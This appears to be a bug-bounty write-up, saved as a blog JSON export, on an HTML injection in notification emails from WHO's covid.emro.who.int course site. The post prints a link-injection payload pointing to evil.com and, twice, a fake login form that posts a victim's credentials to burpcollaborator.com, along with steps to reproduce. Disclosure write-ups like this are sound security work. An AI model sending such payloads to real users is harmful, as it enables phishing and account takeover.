{"id":335,"date":"2026-03-08T03:55:38","date_gmt":"2026-03-08T03:55:38","guid":{"rendered":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/08\/%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who\/"},"modified":"2026-03-08T03:55:38","modified_gmt":"2026-03-08T03:55:38","slug":"%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who","status":"publish","type":"post","link":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/08\/%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who\/","title":{"rendered":"&#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO"},"content":{"rendered":"<p>Hello Hackers, today in this writeup I am going to disclose how I found an HTML injection (HTMLI) in email bug in the <strong>World Health Organization (WHO)<\/strong>, which I found accidentally and which in the end earned me Hall of Fame (HOF) recognition.<\/p>\n<figure><img data-opt-id=866455238  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/837\/1*H2-tqhhS5vsW9jCzv05Jew.png\" \/><figcaption>WHO-HOF<\/figcaption><\/figure>\n<p>After seeing people get rewarded with HOF by WHO, I also wanted to hunt there. During my exam days I just did basic recon like finding subdomains and using Google dorks, Shodan dorks, etc. for passive and active recon.<\/p>\n<blockquote><p><strong>If you want to learn Google dorks and Shodan dorks and become a god at this, then I would recommend following my friend &amp; mentor <\/strong><a href=\"https:\/\/medium.com\/u\/9e41d1b8a839\"><strong>AbhirupKonwar<\/strong><\/a><strong> bhaiya. He is next level in dorking. 
Here I am attaching his lists of writeups on these topics:<\/strong><\/p><\/blockquote>\n<ul>\n<li><a href=\"https:\/\/medium.com\/@abhirupkonwar04\/list\/advanced-google-dorking-8817a1178836\">List: Advanced Google Dorking | Curated by Abhirup Konwar | Medium<\/a><\/li>\n<li><a href=\"https:\/\/medium.com\/@abhirupkonwar04\/list\/5c6b30d7495b\">Advanced Shodan<\/a><\/li>\n<\/ul>\n<p>So during testing I found an interesting subdomain, <a href=\"https:\/\/covid.emro.who.int\/\"><strong>covid.emro.who.int<\/strong><\/a>. After visiting it and understanding its functionality I found a nice scenario: if two people are enrolled in the same course, they can message each other. This functionality pushed me to hunt for <strong>HTMLI, no rate limit, XSS and that type of bug.<\/strong><\/p>\n<p>Then I quickly created two different accounts, enrolled both the victim and the attacker in the course, visited the victim\u2019s profile as the attacker, clicked the message button and typed a basic payload.<\/p>\n<pre>\"&gt;&lt;a href=https:\/\/evil.com&gt;click&lt;\/a&gt;<\/pre>\n<p>To my surprise this payload worked perfectly, and it also rendered when viewed from the victim account. Next I tried for XSS, or blind XSS, which would ultimately give me the cookie of the victim account. But sadly none of the payloads worked\u00a0&#x1f622;. Even simple iframe and marquee tags did not work. At that point I no longer wanted to test this functionality, so I simply closed the victim account in my other (Edge) browser. 
Then I realized that I hadn\u2019t even tested the <strong>form tag<\/strong>, so I simply sent this payload from the attacker account.<\/p>\n<pre>Payload:<br \/>&lt;html&gt;<br \/>&lt;body&gt;<br \/>&lt;h4&gt;Dear victim, for security reasons please enter your email and password so we can confirm your account&lt;\/h4&gt;<br \/>&lt;form action=\"https:\/\/burpcollaborator.com\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"username\"&gt;Email: &lt;\/label&gt;<br \/>  &lt;input type=\"text\" id=\"username\" name=\"username\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"password\"&gt;Pass:&lt;\/label&gt;<br \/>  &lt;input type=\"password\" id=\"password\" name=\"password\"&gt;&lt;br&gt;<br \/>  &lt;input type=\"submit\" value=\"submit\"&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/pre>\n<p>Then I simply clicked send from the attacker account, and guess what happened? &#x1f914; You think this will work &#x1f97a;, but no no no, this also did not work, because they have proper sanitization on the website, or whatever it is, I don\u2019t really know. It simply removed all the form, input, label, html and body tags and wrote the other content as it is, so it looked like this in the message box, and only the <strong>H4 tag worked.<\/strong><\/p>\n<figure><img data-opt-id=831380046  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/793\/1*h1K0pvhAwcw5XMiToLYNOA.png\" \/><\/figure>\n<p>I simply left things as they were, and since I was very tired I just took my phone and scrolled YouTube Shorts for fun. After 2\u20133 minutes I got a mail in the victim account saying the attacker had sent a message. 
I wondered about this, because while testing I had never received any mail before, so I opened the mail and guess what: the payload in the form tag, which was not actually executing on the website, worked perfectly in the email, and the email looked like this:<\/p>\n<figure><img data-opt-id=1275877488  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/854\/1*X05XE2CoDFzcRUKjLNnylA.png\" \/><\/figure>\n<p>I was very happy to see this mail &#x1f929;, because this is a valid <strong>P4\/P3<\/strong> bug called <strong>HTMLI in email<\/strong>, and to show the impact of this bug I showed them the full account takeover (ATO) scenario, i.e. how an attacker can achieve ATO via email HTMLI. You can read the following writeup for a better understanding.<\/p>\n<p><a href=\"https:\/\/infosecwriteups.com\/cracking-ato-via-email-html-injection-edd19c8e1b8f\">Cracking ATO via Email HTML Injection<\/a><\/p>\n<p>I hope I didn\u2019t mess up anything; for your understanding, these are the steps to reproduce. This vulnerability has now been fixed, but you can still try on your own to bypass the fix, report to WHO and wait for HOF\u00a0&#x1f970;.<\/p>\n<p><strong>Steps to Reproduce:<\/strong><\/p>\n<p>1. Visit <a href=\"https:\/\/covid.emro.who.int\/\">https:\/\/covid.emro.who.int\/<\/a><\/p>\n<p>2. Create two accounts: a victim and an attacker.<\/p>\n<p>3. Enroll in a course from both accounts.<\/p>\n<p>4. 
Log out of the victim account, and from the attacker account send the victim a message with the following payload:<\/p>\n<pre>Payload:<br \/>&lt;html&gt;<br \/>&lt;body&gt;<br \/>&lt;h4&gt;Dear victim, for security reasons please enter your email and password so we can confirm your account&lt;\/h4&gt;<br \/>&lt;form action=\"https:\/\/burpcollaborator.com\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"username\"&gt;Email: &lt;\/label&gt;<br \/>  &lt;input type=\"text\" id=\"username\" name=\"username\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"password\"&gt;Pass:&lt;\/label&gt;<br \/>  &lt;input type=\"password\" id=\"password\" name=\"password\"&gt;&lt;br&gt;<br \/>  &lt;input type=\"submit\" value=\"submit\"&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/pre>\n<p>5. The victim gets a mail from the attacker; when the victim enters their credentials, the attacker receives them in Burp Collaborator.<\/p>\n<blockquote><p><strong>Timeline:<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>18-Oct-24: Reported<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>05-Nov-24: Asked for a response; no response from the team so far<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>07-Nov-24: They accepted the report<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>21-Nov-24: Asked for an update; they told me that the vulnerability was not fixed yet.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>29-Nov-24: I told them that the vulnerability was fixed, with a full POC.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>02-Dec-24: They refused to accept this and told me to ask for HOF on 31st Jan 2025, after 3 months, if they didn\u2019t give me any update in that period.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>15-Jan-25: I again told them to check with their dev team because the vulnerability was fixed.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>16-Jan-25: They confirmed that the bug was fixed and asked for details to put 
in HOF.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>05-Feb-25: Awarded HOF\u00a0&#x1f917;<\/strong><\/p><\/blockquote>\n<p>I know this is a very long process. I don\u2019t know why this happened to me. In other cases they respond well, but in my case it took 3+ months to finally award HOF. But in the end the hard work and time you invest are never wasted. You will be rewarded according to your hard work.<\/p>\n<p>Thank you for reading this writeup; I will see you in the next amazing one. Clap if you found it helpful. Bye\u00a0&#x1f44b;<\/p>\n<hr \/>\n<p><a href=\"https:\/\/osintteam.blog\/%EF%B8%8F-%EF%B8%8Fmy-journey-of-securing-who-85f36c6caf0f\">&#x1f575;&#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO &#x1f30f;<\/a> was originally published in <a href=\"https:\/\/osintteam.blog\/\">OSINT Team<\/a> on Medium, where people are continuing the conversation by highlighting and responding to this story.<\/p>","protected":false},"excerpt":{"rendered":"<p>Hello Hackers, Today in this writeup I am going to disclose how I found an HTMLI in email bug in World Health Organization (WHO) which was found accidentally and at the end leads me to achieve HOF recognition. WHO-HOF After seeing people are rewarded HOF from WHO then I am also want to hunt. 
During &#8230; <a title=\"&#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO\" class=\"read-more\" href=\"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/08\/%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who\/\" aria-label=\"Read more about &#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-335","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/comments?post=335"}],"version-history":[{"count":0,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/335\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media\/336"}],"wp:attachment":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media?parent=335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/categories?post=335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/tags?post=335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}